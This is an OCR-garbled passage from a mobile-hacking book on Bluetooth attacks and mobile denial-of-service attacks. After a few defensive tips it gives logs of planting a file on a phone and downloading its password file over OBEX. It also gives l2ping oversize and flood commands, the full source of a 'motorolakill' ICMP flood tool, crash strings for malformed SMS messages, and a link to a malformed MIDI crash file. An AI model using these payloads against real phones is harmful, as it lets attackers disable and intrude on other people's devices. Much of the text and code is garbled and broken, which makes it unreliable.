  1. One should not enable Bluetooth unless it is absolutely necessary. It is always a good idea to keep your mobile phone device in the Hidden mode to make it all the more difficult for malicious attackers to discover your presence. It is also important to remain alert when you are in crowded places like conferences, shopping malls, offices, movie theatres, airports, etc.
  2. One should not accept files or business cards or any other incoming Bluetooth data from unknown people. In most cases, such unsolicited incoming traffic is nothing but spam or a malicious attack attempt.
  3. One should download and install the latest patches, fixes and updates releazed by the mobile phone device manufacturer.
  4. Application developers should avoid using short pairing codes (4 digits long) as they make life easier for an attacker. It is adviable to use the available 16 digits long pairing codes for a higher level of security.
  5. Developers and manufactures must avoid using default pairing codes as they can easily be guessed and cracked by malicious attackers.
  6. One should change the default name of one’s Bluetooth enabled mobile device to prevent private information like handset model name and version from getting displayed to prying eyes.
  7. One should check the list of paired devices on the mobile phone

 

device and remove any unwanted Bluetooth pairings. Typically this can be done by following the below steps (On Nokia 6310 or 6310i Or 6600 or 7650 or 8910 or most other models):

 

  • Select the menu button to browse to the Bluetooth menu > view Paired devices to display a list of paired devices.
  • Select the Delete Pairing option to remove a particular Bluetooth

 

  1. Governments and organizations around the world must implement more Bluepot systems to study and better understand patters of Bluetooth related attacks and attack tools.

 

Live Attack Logged Data

 

Case Study 1

The following is an excerpt from the log file of a live attack that was executed using the Affix btftp tool running on Linux:

ankitfadia:# btftp

Affix version: Affix 3.2.0

Welcome to OBEX ftp.

 Type ? for help.

Mode: Bluetooth

SDP: yes

 

ftp> open 00:60:57:17:b3:a5

Service found on channel: 2

Connected.

 

Established connection with my mobile phone device.

 

ftp> is

drwdx            0

drwdx            0

drwdx            0

drwdx            0

Command complete.

 

Personal

 Internet

Business

 Templates

 

A simple file listing command to get a list of files in the default directory on the mobile phone device.

ftp>cd ../

Command complete.

 

 

ftp> cd test

 Command complete.

ftp> is

drwdx                 0

••

 

ftp> put /etc/test virusfile

Transfer started…

Transfer complete.           

12 bytes sent in 0.0 secs (1028.00 B/s)

 

Successfully uploaded a virus or malicious file to my mobile phone device without any authorization or password entry. The following is the log of a new session:

ftp> is

drwdx                 0                Personal

drwdx                 0                 Internet

drwdx                 0                 Business

drwdx                 0                Templates

Command complete.

ftp> cd ../

 Command complete.

ftp> is

drwdx                 0                   ABC.jpeg

drwdx                 0                     ABCD.jpeg

drwdx                 0                   Folderl

drwdx                 0                  Folder2

drwdx                       0                  Network

drwdx                       0                   Applications

drwdx                       0                etc

drwdx                       0                  Research

drwdx                       0                   Favourite.i

drwdx                       0                  eBooks

drwdx                       0                  More

drwdx                       0                    Listing

drwdx                       0                     E-mails

drwdx                       0                   Other

-drwdx                       0                  bin

drwdx                       0                  hosts

Command complete.

 

 

ftp> cd etc

Command complete.

 

ftp> ls drwdx drwdx drwdx drwdx drwdx drwdx drzvdx drzvdx drwdx drwdx drwdx drzvdx drwdx drwdx drzvdx drwdx drwdx drwdx drzvdx drwdx drwdx drwdx drwdx drwdx drzvdx drwdx drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

drwdx

0                          ABC

0                          AB CD

0                         Folderl

0                        Folder2

0                       Book.1

0                        Book2

0                        Book3

0                       xyz

0                       pqr

0                           Curry

0                        Akanksha

o                        Alka

0                        Ankit

0                          AnkitFadia

0                        Aditya

0                        Qabc

0                        Qabcd

0                       qabcde

0                        Others

0                         MoreData

0                         passed

0                        Pen

0                        Scripts

0                         Stanford

0               Silicon Valley papers

0                           San Francisco

0                          Putra Jaya

 

Drwdx                                   0        Cyber Jaya

Drwdx                                0           Singapore

Drwdx                        0         B ugis

Drwdx                                         0    Evans Lodge

Drwdx                                       0       Photographs

Drwdx                   0              SQ

Drwdx           0           Schwezwan Cafe

Drwdx                           0       Sanjiv

Drwdx                              0   Hosts

Drwdx                             0     Allowed

Drwdx                             0    Denied

 

drwdx              0.

drwdx               0

drwdx               0

drwdx               0

drwdx                0

drwdx                0

drwdx                0

drwdx                0

drwdx                0

drwdx                0

Command complete.

Websites network Data

IPR

Contracts Revenue bin

Tata

Stocks

Questions

 

                                Denied

 

 

ftp> get passwd Transfer started… Transfer complete.

3240192 bytes. received in 0.05 secs (64803840 B/s)

 Downloaded the password file containing account information.

Case Study 2

                               The following is the log file of Nokia 6310i mobile device from the Blueprint tool:

00:60:5 7:xx:xx:xx

—info

device: Nokia 6310i

version: V 5.22 15-11-02 NPL-1

V 5.50 03-03-03 NPL-1 (c) NMP date: n/a

type: mobile phone

note: n/a

/—info

Vulnerability List:

  • Buffer Overflow in OBEX stack

see: http:11www.pentest.co.ukIdocumentslptl-2004-01.html

  • Phone book reading without paring

Details:

RFCOMM channels 17 and 18 open and accessable without pairing

Version: V 5.22 15-11-02 NPL-1

 

—sdp

Browsing 00:60:57:xx:xx:xx

Service Name: Fax

Service RecHandle: Ox10000 Service Class ID List:

“Fax” (0x1111)

“Generic Telephony” (0x1204)

Protocol Descriptor List: “L2CAP” (0x0100) ‘`RFCOMM” (0x0003) Channel: 2

Language Base Attr List: code_IS0639: 0x656e encoding: .0x6a

base_offset: Ox100

Profile Descriptor List: “Fax” (0x1111)

Version: Ox0100

Pairing needed!

Service Name: OBEX Object Push Service RecHandle: Ox10001 Service Class ID List: –

“OBEX Object Push” (0x1105) Protocol Descriptor List:

“L2CAP” (0x0100)

“RFCOMM” (0x0003)

Channel: 9

“OBEX” (0x0008)

Language Base Attr List: code_IS0639: 0x656e encoding: Ox6a

base_offset: Ox100

Profile Descriptor List:

“OBEX Object Push” (0x1105) Version: Ox0100

Service Name: Audio Gateway Service RecHandle: 0x10002 Service Class ID List:

“Headset Audio Gateway” (0x1112) “Generic Audio” (0x1203)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 12

Language Base Attr List: code_IS0639: 0x656e encoding: Ox6a

base offiet: Ox100

Profile Descriptor List.’ “Headset” (0x1108) Version: Ox0100

Pairing needed!

Service Name: COM 1 Service RecHandle: 0x10003 Service Class ID List:

“Serial Port” (0x1101) Protocol Descriptor List:

“L2CAP” (0x0100)

“RFCOMM” (0x0003)

Channel: 3

Language Base Attr List:

 Code_ISO639 : 0x656e
encoding: Ox6a base_offset: Ox100

Pairing needed!

Service Name: Voice Gateway

 Service Rec,Flandle: 0x10004

Service ClassID List:

“” (0x111.1)

 

“Generic Audio” (0x1203)

Protocol Descriptor List:

 “L2CAP” (0x0100)

 “RFCOMM” (0x0003)

Channel: 13

Language Base Attr List:

Code_IS0639: 0x656e

encoding: Ox6a

base offiet: Ox100

Profile Descriptor List: “”(0x111e)

Language Base Attr List:

code IS0639: 0x656e

encoding: Ox6a

base offset: Ox100

 

Profile DescriptorList:

“Dialup Networking” (0x1103)

Version: Ox0100

Pairing needed!

/—-sdp

Requesting information- …

BD Address: 00:60:57:xx:xx:xx

LMP Version: 1.1 (0x1) LMP Subversion: 0x22c

Manufacturer: Nokia Mobile Phones (1)

Features: Oxbf 0x28 0x21 Ox00

 

<3-slot packets> <5-slot packets> <encryption> <slot offset>

<timing accuracy> <role switch> <sniff mode> <SCO link>

<HV3 packets> <CVSD>

Version: V 5.50 03-03-03 NPL-1 (c) NMP.

Browsing 00:60:57:xx:xx:xx

Service Name: Fax

Service RecHandle: Ox10000

Service Class ID List:

“Fax” (0x1111)

“Generic Telephony” (0x1204) Protocol Descriptor List:

“L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 2

Language Base Attr List: code_IS0639: Ox656e encoding: Ox6a

base_offset: Ox 100

Profile Descriptor List:
“Fax” (0x1111)

 

Version: Ox0100

Service Name: OBEX Object Push Service RecHandle: Ox10001

 Service Class ID List:

“OBEX Object Push” (0x1105) Protocol Descriptor List:

“L2CAP” (0x0100) “RFCOMM” (0x0003)

Channel: 9

“OBEX” (0x0008)

Language Base Attr List:

code IS0639: 0x656e

encoding: Ox6a

 

base offset: Ox100

Profile Descriptor List:

“OBEX Object Push” (0x1105) Version: Ox0100

Service Name: Dial-up networking Service RecHandle: 0x10002 Service Class ID List:

“Dialup Networking” (0x1103) “Generic Networking” (0x1201)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003)

Channel: 1

Language Base Attr List: code IS0639: 0x656e

encoding: 0a6a

base offset: Ox100
Profile Descriptor List:

“Dialup Networking” (0x1103) Version: Ox0100

Service Name: Nokia PC Suite Service RecHandle: Ox10003 Service Class ID List:

“Serial Port” (0x1101) Protocol Descriptor List:

“L2CAP” (0x0100)

“RFCOMM” (0x0003)

Channel: 15

Language Base Attr List: code_IS0639: 0x656e encoding: Ox6a

base_offiet: Ox100

Service Name: COM 1

Service RecHandle: 0x10004

Service Class ID List: “Serial Port” (0x1101)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 3

Language Base Attr List:

code _ISO 639: 0x656e encoding: Ox6a base_offset: Ox100 ,

Service Name: Voice Gateway Service RecHandle: 0x10005 Service Class ID List:

“” (Ox1 11f)

“Generic Audio” (0x1203)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 13

Language Base Attr List:

 code_ISO639:Ox656e encoding: Ox6a

base_offiet: Ox100

Profile Descriptor List:

“” (0x111e) Version: Ox0100

Service Name: Audio Gateway

Service RecHandle: 0x10006

Service Class ID List:

“Headset Audio Gateway” (0x1112)

“Generic Audio” (0x1203)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 12

Language Base Attr List: code IS0639: Ox656e encoding: Ox6a

base offset: Ox100

Profile Descriptor List: “Headset” (0x1108) Version: Ox0100

BD Address: 00:60:57:xx:xx:xx

LMP Version: 1.1 (0x1) LMP Subversion: 0x22c

Manufacturer: Nokia Mobile Phones (1)

Features: Oxbf 0x28 0x21 0x00 Ox00 Ox00 Ox00 Ox00

<3-slot packets> <5-slot packets> <encryption> <slot offset>

      <timing accuracy> <role sw. itch> <sniff mode> <SCO link>

 <HV3 packets> <CVSD>

 

MOBILE DOS ATTACKS

·       Does your mobile phone suddenly hang, crash or reboot for no valid reason?

·       Does the battery of your mobile phone device get depleted on its own?

·       Are you unable to make phone calls or send SMS text messages from your phone because it simply stops working?

Mobile Denial of Services attacks or MDOS attacks are indeed one of the
most dangerous attacks possible against mobile phone devices. They are
aimed at making the target Bluetooth device completely unusable such that

            all its Bluetooth communication channels become extremely  jammed or stop working. In other words, such denial of services attacks are launched with the aim of preventing the target mobile device from communicating with any other Bluetooth enabled device. This not only causes a lot of  inconvenience to the victim but also leads to a decrease in efficiency

 

Most mobile denial of services attacks exist due to loopholes in the manner in which the Bluetooth communication suite is implemented. Typically such attacks arise due to a lack of proper implementation   rules for handling, validation and checking of data packets in Bluetooth. It is attackers to exploit such loopholes in the Bluetooth   .implementation to carry out malicious attacks on the victim mobile device. Typically Mobile DOS

attacks are aimed at hanging or crashing the target device or at simply clogging all the available bandwidth to stop all data transfer.

In a layman’s terms, in a mobile DOS attack, the attacker sends garbled or infinite data to the victim mobile device. The victim mobile device cannot understand this garbled information as it can only handle data that follows the Bluetooth rules. Since the victim computer does not know what to do with the garbled information, as a result, it is forced to crash, hang or simply reboot. In others words, one can describe a mobile DOS attack, as one in which the attacker clogs up so much memory or bandwidth on the target system/network that it cannot serve legitimate users.

Most mobile DOS attacks exist because the data that is sent by the attacker to the victim is not checked for its contents, structure, routing information and length. However, it will certainly be unfair to place all the blame on the developers for not building more input validation into the networking protocols itself. Many mobile DOS attacks are actually known to exploit the normal, legitimate rules and concepts of communication protocols like Bluetooth itself. As a result, input validation is not the only answer to all DOS attacks on the Internet. Although there are a variety of mobile DOS attacks, typically most of the attacks can be depicted as follows:

ATTACKER—————–Sends Malicious\Infinite Data————àVICTIM

VICTIM ——————-Cannot Handle Malicious Data————–àCRASHES

  1. The attacker uses packet generation software togenerate either infinite or malicious data. These data packets are then transmitted to the victim mobile device using the specified protocol suite.
  2. Since the victim mobile device cannot handle this malicious data it crashes, hangs or simply reboots. This occurs due to a lack of validation of data by the Bluetooth protocol suite at the victim’s end.

 

Unfortunately, what makes such attacks all the more dangerous is the fact that they are extremely easy to execute. There are a number of ready to use mobile DOS attack tools available on the Internet that can be easily downloaded and used to carry out attacks against victim mobile devices.

             Typically a mobile DOS attack can lead to a number of problems listed as follows:

 

 

  1. Leads to temporary wastage of critical infrastructure like bandwidth, memory and systems.
  2. Legitimate users are denied access to important services and data stored on the victim mobile device.
  3. Clients are either completely disconnected or drastically slowed down while accessing data or services on the victim mobile device.
  4. Mobile DOS attacks temporarily render most services offered by the victim mobile device useless. This leads to a disruption of development, communication, research and all other forms of work. As a result, in case of an organization, such attacks indirectly can also lead to a short-term loss of revenues.
  5. Can also lead to a loss of data, time and wastage of resources. Moreover, they can also sometimes cause widespreadinconvenience, inefficiency and dissatisfaction.

There are a variety of different types of currently known mobile denial of services attacks that are explained in detail later in this chapter, namely,

  1. Bluesmacking (Ping of Death)
  2. Ping Flooding
  3. Jamming
  4. Malformed OBEX Message Attack
  5. Failed Authentication Attack
  6. Extreme Bluejacking
  7. Malformed SMS Text Message Attack
  8. Local Malformed SMS Text Message Attack
  9. Malformed Format String Vulnerability

Case Studies

Sydney, Australia 

     A college student at a local university in Sydney bought herself a brand new Nokia 6310 mobile phone. She was an average mobile phone user who used her phone just for making and receiving phone calls and sometimes for text messaging purposes as well. One day when she was in the middle of a phone call, her mobile phone simply stopped working and got disabled. She tried to press all possible buttons to get the phone to start working again but unfortunately nothing happened. Her phone had for some reason lost all phone calls, messaging and gaming capabilities. Even when she pressed the OFF button there was no response. Finally, in order to get her mobile phone working she was forced to remove her battery and put it back in, Since then the college student has been facing a similar problem on a very regular basis.

                  Paris, France                                                                                                                                                                                                     

     A businessman from London, UK was visiting Paris on a business trip. On his way to the conference venue from the airport he was using his mobile phone to connect his laptop to the Internet. He was downloading a few PowerPoint slides that he needed to include in his presentation at the conference. Suddenly he received a SMS text message and as soon as he viewed it his mobile phone got disabled and stopped working. He was extremely perplexed and did everything that was possible to make his mobile phone work again. Finally only when he removed the battery and reinserted it, did the mobile phone start working again. Not only was he not able to prepare his presentation properly but also his mobile phone remained unusable for a considerable amount of time. Since then the businessman has discarded that mobile phone and replaced it with another model.

Different Types Of Attacks

Bluesmacking (Ping of Death)

The Bluesmacking DOS attack is a classic example of a mobile denial of services attack that can be used against a variety of different mobile phone devices. This attack can be used to either crash, hang or reboot the target mobile phone device.. Bluesmacking is often described as a mobile phone attack equivalent to the ping of death DOS attack, existing on systems running older versions of Windows. In the ping of death attack an attacker sends a large number of ICMP echo requests to the vulnerable target computer with an aim to crash, hang or reboot it. A number of mobile devices continue to remain vulnerable against the Bluesmacking attack.

According to Bluetooth implementation rule, each Bluetooth enabled mobile device has an upper limit restriction on the size of a data packet that can be safely transmitted over the network. In other words, it means that the Bluetooth implementation was not designed to handle packets having a size greater than a certain predefined maximum number. A mobile device receiving such an oversized data packet (whose size is greater than the predefined maximum allowable size) will probably crash, reboot or hang. Hence, in the Bluesmacking attack the attacker creates an oversized data packet having a size greater that the maximum allowable size and sends it to the victim mobile device. It is important to note that different mobile devices may have varying lengths of maximum allowable data packet sizes. Typically an attacker will accordingly vary the size of the malicious data packets based on the version of the target mobile device.

 

 Hacking Truth: The Ping of Death DOS attack is one of the most common examples of attacks against computer systems. The name ‘Ping of Death’ is derived from the fact that this attack can easily be carried out using the ping utility, which is built into almost every single Unix and Windows machine. As a result, an attacker can actually execute this attack using most operating systems without having to download or install any third party tools. The ping utility is normally used to detect whether a remote computer is alive or not. It uses the Internet Control Message Protocol (ICMP) for its functioning purposes.

 

The Bluesmacking DOS attack makes use of the Logical Link Control and Adaptation Layer Protocol or the L2CAP protocol — the part of the Bluetooth communication suite that is responsible for conveying the quality of service information and controlling the packet segmentation and reassembly. The L2CAP layer of Bluetooth is something like what the Internet Control Message Protocol (ICMP) functions for the TCP/IP protocol suite. Amongst a number of other things, the L2CAP layer of the Bluetooth implementation allows a Bluetooth enabled device to request an echo from another device in order to test its presence. The Linux Bluez package ships with a number of standard tools including l2ping. This l2ping tool was originally meant for Bluetooth devices to check connectivity by querying and confirming each other’s presence. Using this tool, the source Bluetooth enabled device sends an echo request to the destination device and waits for a response. If the destination Bluetooth device is alive then it sends back an Echo reply to the source, otherwise no response is generated. Typically, the working of the Bluetooth l2ping can be depicted in the

following manner:

Step 1: DEVICE 1   L2CAP Echo Request —-> DEVICE 2

Step 2: (Alive) DEVICE 2 _________________________ L2CAP Echo Reply —> DEVICE 1
(Not Alive) No Response

 

By default, the l2ping utility normally sends a data packet having a value of 20 bytes. However, in case of the Bluesmacking attack, the attacker manually customizes the size of the outgoing data packet in such a manner that it exceeds the maximum allowable size of the target mobile device. As a result, since the size of the data packet is more than the maximum allowable size, the target mobile device will not be able to handle it and will hang, crash or reboot. The size of the outgoing data packet can easily be customized by making use of the size(-s) argument of the l2ping utility. As soon as this oversized packet reaches the target mobile device the necessary malicious result (DOS attack) will be observed. The syntax of the l2ping utility is as follows:

l2ping [ -S source address [-c count] [ -s size ] [ -f < address > where

 

-S source address: specifies the source address to be used to send the echo request.

-c count: specifies that the tool must count the number of packets sent to the mobile device.

-s size: specifies the size of the data packet to be sent.

-f: can be used to flood the target mobile device. It reduces the delay time between successive packets to 0.

< address >: specifies the target mobile device address.

For example, the following output depicts a Bluetooth device being queried for an echo request using the l2ping tool:

/home/ankitfadia # l2ping 00:80:37:B9:A1:2C

Ping: 00:80:37:B9:A1:2C from 00:80:37:B9:AI:2B (data size 20) …

20 bytes from 00:80:37:B9:A1:2C id 100 time 63.31ms

20 bytes from 00:80:37:B9:A1:2C id 101 time 42.39ms

20 bytes from 00:80:37:B9:AI:2C id 102 time 42.12ms

20 bytes from 00:80:37:B9:A1:2C id 103 time 41.08ms

20 bytes from 00:80:37:B9:A1:2C id 106 time 40.51ms

5 sent, 5 received, 0% loss

Keeping the above syntax rules in mind, the Bluesmacking attack can be executed using the l2ping utility of the Linux Bluez package in the following manner:

 

/home/ankitfadia # l2ping —s 1000 00:80:37:B9:A1:2C

Ping: 00:80:37:B9:A1:2C from 00:80:37:B9:A1:2B (data size 1000) …

1000 bytes from 00:80:37:B9:A1:2C id 100 time 63.31ms

1000 bytes from 00:80:37:B9:A1:2C id 101 time 42.39ms 1000 bytes from 00:80:37:B9:A1:2C id 102 time 42.12ms

 

Hacking Truth: The Linux Bluez package includes a variety of different tools mainly:

 

Tool Function
hciattach

hciconfig

hcid

     ciptool

 

  Used to connect to serial ports.

  Used to configure Bluetooth devices

 The Bluetooth Host Controller Interface Daemon

 Used to setup, maintain and configure the Bluetooth   

CommonISDNAccess Profile (CIP)

 

 

 

 

 

 

Faclia’s Hot Picks for Popular Bluesmacking Tools

 

  1. Utility Name: Bluez

Features: It is the official Linux Bluetooth protocol stack and implements the Bluetooth wireless standard and contains the 12ping tool.

Download URL: http://www.bluez.org

  1. Utility Name: Tanya

Features: A DOS attack tool that is similar to l2ping. Download URL: http://www.transient-iss.com

  1. Utility Name: T-Bear

Features: A Bluetooth environment auditor for Linux. Download URL: http://wwwtransient-iss.com

  1. Utility Name: Motorola Kill

Features: A proof of concept tool written by Shaun Colley that floods
vulnerable Motorola devices with IP traffic (SYN packets or ICMP

echo packets) and crashes it. Source Code:

 

# motorolakill.c

#include <stdio.h> #include <stdlib.h>

#include <netinet/in.h>

#include <netdb.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

int main (int argc, char *argv[])

if(argc < 2)

printf(“Usage: %s <host>ln”, argv [0] );

exit(0);

}

int sock;

char packet[5000] ;

int on = 1;

struct sockaddr in dest;

 struct hostent *host;

struct iphdr * ip = (struct iphdr *) packet;

struct icmphdr *.icmp = (struct icmp *) packet

+ sizeof(struct iphdr);

if( (host = gethostbyname(argv[1])) == NULL) {

printf(“Couldn’t resolve host\n”);

exit(-1);

}

if(sock = socket(AF_INET, SOCK_RAW, IPPROTOICMP)) == -1)

{

printf(“Couldn’t make socket!\n”);

printf(” You must be root to create a raw socket.ln”);

exit(-1);

}

 

if((setsockopt(sock, IPPROTO IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0) {

perror(“setsockopt”);

 exit(1);

}

dest.sin _family = AF _IN ET;

dest.sin_addr = * ( (struct in_addr *)host->h_addr);

ip->ihl =5;

 

ip->id = htons(1337);

 ip->ttl = 255;

ip->tos = 0;

ip->protocol = IPPROTO_ICMP;

.ip->version = 4;

ip->frag_off = 0;

ip->saddr = htons(“1.3.3.7”);

ip->daddr = inet_ntoa(dest.sin_addr);

ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);

ip->check = 0;

icmp->checksum = 0;

icmp->type = ICMP_ECHO;

icmp->code = 0;

printf(“Ping flooding %s.11n”, argv[1]);

/* begin flooding here. */

while(1) {

sendto(sock, packet, ip->tot_len, 0,

(struct sockaddr *)&dest, sizeof(struct sockaddr));.

}

return (0) ;

}

# EOF motorolakill.c

Hacking Truth: Ping flooding is a slightly modified version of the Bluesmacking DOS attack that affects a number of different mobile phone devices. Every Bluetooth enabled device can handle only a limited number of connections at the same time. Once this maximum number of simultaneous connections limit has been reached, then the Bluetooth device can no longer establish any new connections. The 12ping tool requires a connection to be established for each echo request that it sends to a remote Bluetooth enabled device. This means that a flood attack carried out using the 12ping tool can actually paralyse the Bluetooth capabilities of the target mobile phone device. When successfully carried out, the Ping flooding attack can crash, reboot or hang a target vulnerable mobile phone device. The victim mobile device will no longer be able to discover other Bluetooth devices nor will it be able to accept any incoming connection requests. The ping flooding attack is quite easy to execute using a modified version of the 12ping tool in the following manner:

 

For example,

/home/ankitfadia # l2ping —f 00:80:37:B9:A1:2C

It is important to note that depending upon the target mobile device, the ping flooding attack can be used to attack even devices  the hidden mode.

Jamming

As discussed earlier, Bluetooth is nothing but radio signals working in the 2.4 GHz frequency range. This makes it potentially vulnerable against interference

 or jamming attacking or DOS attacks By a number of other noisy appliances like phones, microwave ovens and more. Bluetooth uses a process called frequency hopping and keeps changing its operating frequency to make it very difficult for an attacker to carry out a jamming attack. It is important to note that such attacks are not very common since they require the entire band to be jammed which is not very feasible.

Malformed OBEX Message Attack

There are a number of Bluetooth and Infrared enabled mobile phones from different manufactures (like Nokia, Sony Ericsson, Samsung, Motorola and many others) available in the market. All these mobile phones use the Object Exchange or OBEX protocol to send and receive data. In early 2004, an OBEX related denial of services attack was discovered in a number of mobile phone devices that could be exploited by an attacker to remotely crash and reboot the vulnerable device.

In this type of a DOS attack, the attacker sends a malformed OBEX packet to the target mobile phone. As soon as the vulnerable mobile device receives the malformed packet, it will terminate all currently active operations and will be forced to reboot. As a result all currently active operations like a phone call, a text message or a game will be lost. Such attacks can also lead to the depletion of the battery of the target mobile device. Not only can this attack -lead to a loss of data but it can also cause a lot of inconvenience. However, it is important to note that once the target mobile device reboots it will become fully operational again. One can argue that such DOS attacks do not really harm the target mobile device and merely cause disturbance, annoyance and inconvenience. Nonetheless the number of incidents of malformed OBEX message attacks has been steadily rising in the last few years. Typically, it is possible to execute this attack by following these steps:

 

                  


  1. Identify a vulnerable target device that you wish to attack. For example, Nokia 6310i.
  2. Create a malformed OBEX message and send it via Bluetooth or Infrared to the target mobile device and wait for the fun to start!

Failed Authentication Attack

 

The failed authentication DOS attack is a proof-of-concept attack that demonstrates yet another technique of denying legitimate services and users from running on the target mobile phone device. Although this technique is still in the nascent stage enough instances have already been recorded where it has been successfully used against a number of different mobile phone handsets. If carried out properly it has the potential to cause a lot of inconvenience to the victim mobile phone device. This attack is indeed one of the most dangerous (currently known) DOS attacks against mobile phone devices.

According to Bluetooth implementation rules, each time a Bluetooth authentication process between any two devices fails, then they must wait for a certain amount of time to pass before they can attempt to establish a connection again. For example, let us consider a scenario where Bluetooth device A tries to establish a connection with device B. If for some reason the Bluetooth connection request does not get authenticated, then device A will not allow device B to again make a connection attempt until a pre-defined period of time has passed. Unfortunately, this Bluetooth behavior can potentially be exploited by attackers to disable victim users and services.

It is possible for an attacker to pretend to be a trusted mobile phone device (say device B) and flood the target Bluetooth enabled device A with bogus spoofed connection requests, such that even legitimate connection requests from device B will be rejected. Each time a failed authentication is simulated by the attacker, a time period of no more connection attempts (from device B) will be set by device A. This will not only unnecessarily clog up resources on device A but will also make it impossible for device B to be able to establish a Bluetooth connection with device A. Hence, this technique can not only be used to make the Bluetooth features of a device unusable but it can also be used to prevent two Bluetooth devices from communicating with one another. Such attacks also lead to the depletion of the battery of the target mobile phone device. One can carry out this attack by writing one’s own custom built tools that simulate the various attack conditions. Typically one can carry out such failed authentication attacks by the following steps:

 

  1. Identify two Bluetooth enabled victim devices that trust and communicate with each other regularly.
  2. Send packets to one of the devices in such a manner that they seen, to originate from the other trusted device. It is important to carry out this step before the two legitimate target Bluetooth devices have established a connection with each other.
  3. Repeat step 2 incessantly until all resources on the target mobile phone device have been used up. At this stage either the target device will no longer have adequate memory to allow legitimate services or will deny connections to even legitimate trusted mobile devices.

 

Extreme Bluejacking

In the previous section, we have already seen how Bluejacking can be used

to send unsolicited messages to a mobile device using the Bluetooth protocol.

It is actually possible for an attacker to use the Bluejacking technique to repeatedly send annoying messages to the target mobile phone device. If an attacker were to keep sending messages to a victim using Bluejacking then it will not only keep the victim’s resources busy but will also cause a lot of inconvenience and annoyance.

The fact that sending Bluetooth messages to a mobile device is both free and anonymous makes such attacks all the more popular. Even though such attacks are not technically real DOS attacks, they can nonetheless cause unnecessary problems for the victim. Although the Extreme Bluejacking DOS attack can be executed manually, it is best if one uses an automatic tool for the most efficient results.

 

Malformed SMS Text Message Attack

 

Some of the most popular Siemens mobile phone devices including the *35 and *45 series are vulnerable to an attack involving malformed SMS text messages that can cause the target mobile device to either crash, hang or simply reboot. If an attacker were to send a malformed SMS text message to a vulnerable phone then considerable inconvenience and inefficiency may be caused. Such a DOS attack can easily be executed by an attacker by sending the following malformed SMS text message to the vulnerable target mobile phone device:

“`YoLanguageName”

In the above syntax, LanguageName is actually the name of a language supported by the vulnerable mobile phone device. It is also important to note that the attack requires the double quotation marks to be present in

the message and the first letter of the language name must always be in uppercase. For example, such a malformed SMS text message DOS attack can easily be executed by any of the following malformed messages:

“%English”

“%Deutsch”

 “%H in di”

When a vulnerable Siemens device receives a malformed text message of any of the above type, then it will become disabled or will hang for a temporary period of time. Typically the display screen will get stuck at the Please Wait message. For example, when such an attack is executed,

the Siemens *35 series mobile phones gets disabled while the Siemens *45 series will hang for almost 2 minutes. Similarly, when the Siemens C55 mobile phone receives such a malformed text message it will immediately hang for some time. If this malformed SMS text message attack is repeated for about 10-15 times it can actually even completely deplete the victim’s phone battery. The fact that this vulnerability can be exploited remotely using a simple

SMS text message makes it extremely dangerous and easy to, execute. According to a statement issued by Siemens, all devices from the          series
on (except the S40 and CL50 as well as, Cordless phones & Gigasets) are vulnerable to this attack.

On most vulnerable Siemens mobile phone devices one will have to remove the battery for a few seconds and then put it back. Once this is done the victim will be able to delete the malicious SMS text message. However the Siemens C35i, M35i and S35i mobile phone devices do not allow users to delete text messages without viewing them. Hence, on such devices the best way to delete the malicious message is to insert the SIM card into some other phone and then carry out the normal deletion process.

Local Malformed SMS Text Message Attack

In the previous example we discussed how some of the most popular Siemens mobile phone devices are vulnerable to a remote malformed SMS text message DOS attack. Most Siemens mobile phone devices are also vulnerable to similar local malformed DOS attacks. A text message of the following format can cause a vulnerable mobile phone device to hang:

“%anystring”

In the above syntax, anystring can be absolutely any text string. It is also
important to note that the attack requires that all letters of the malformed

string message be in lowercase. For example,. such a local DOS attack can, easily be executed through any of the following malformed messages:

“%ankitfadia”

“%singapore”

“%usa”

When the local text message vulnerability is exploited on a vulnerable mobile device then it either hangs, crashes or gets disabled.

Malformed MIDI File DOS Attack

A number of LG mobile phone devices including the popular LG U8210 are vulnerable to a malformed MIDI File DOS attack. It is possible for an attacker to send a specially designed malformed MIDI file to a vulnerable mobile phone device in order to carry out a DOS attack. As soon as the vulnerable mobile phone device plays the malformed MIDI file, it will either crash, hang or reboot. This attack can be executed by observing the following the below

steps:

  1. Download the malformed MIDI file from http://www.lucaercoli.itl LG/Igfreeze.mid.
  2. Send this file as a MMS message to the victim mobile phone device.

Hacking Truth: Last year Nextel and Motorola announced that a number of their mobile phone devices including the Motorola i205, i305, i530, i710, i730, 1733, i736 and 1830 are vulnerable to rebooting as soon as their GPS function is used. Fortunately, fixes have already been releazed and made available to consumers.

 

Malformed Format String Vulnerability

 

A number of business and personal users depend upon their mobile phone devices to store, edit and transfer their contact list or address book. One of the most popular standards for storing and transferring business cards is known as vCards. A vCard is nothing but an extension of the SMS text messaging facility that provides a
platform for users to exchange their business cards with one

another. Unfortunately, a number of Nokia mobile phone devices

including the 6210 model are vulnerable to an attack involving malformed vCard messages.

It is possible for an attacker to input malicious format strings into multi­part vCard messages and send them to vulnerable mobile phone devices. As soon as the target mobile phone device receives the malformed vCard message. it will crash, hang or simply reboot. On certain occasions, the victim will even be required to remove the battery and put it back in to make the mobile phone device work again. Sometimes the SMS receiver tool might crash or a business card with garbled text might be displayed on the screen. At the time of print, unfortunately, Nokia had still not releazed a fix for this loophole. Many mobile phones continue to remain vulnerable to such attacks.

Hacking Truth: There are a number of Pocket PC mobile devices including iPaqs that are vulnerable to a DOS attack that can be executed to fill up all the available local storage. When an attacker sends a business card or vCard to the victim Pocket PC mobile phone device, then it will automatically be added to the local address book. If an attacker sends a large number of vCard messages to the victim mobile device then slowly but surely all the memory on it will get used up.

 

 

 

Vulnerable Mobile Phone Handsets

A large number of handset models are vulnerable to the different DOS attacks that we discussed in this chapter, namely:

 

Nokia 6210                                              ✓

Nokia 6230                                              ✓

Nokia 6310                                              ✓

Nokia 6310i                                             ✓

Nokia 6600                                              ✓

Nokia 6810                                              ✓

Nokia 6820                                              ✓

Nokia 7650                                              ✓

Nokia 8910                                            ✓

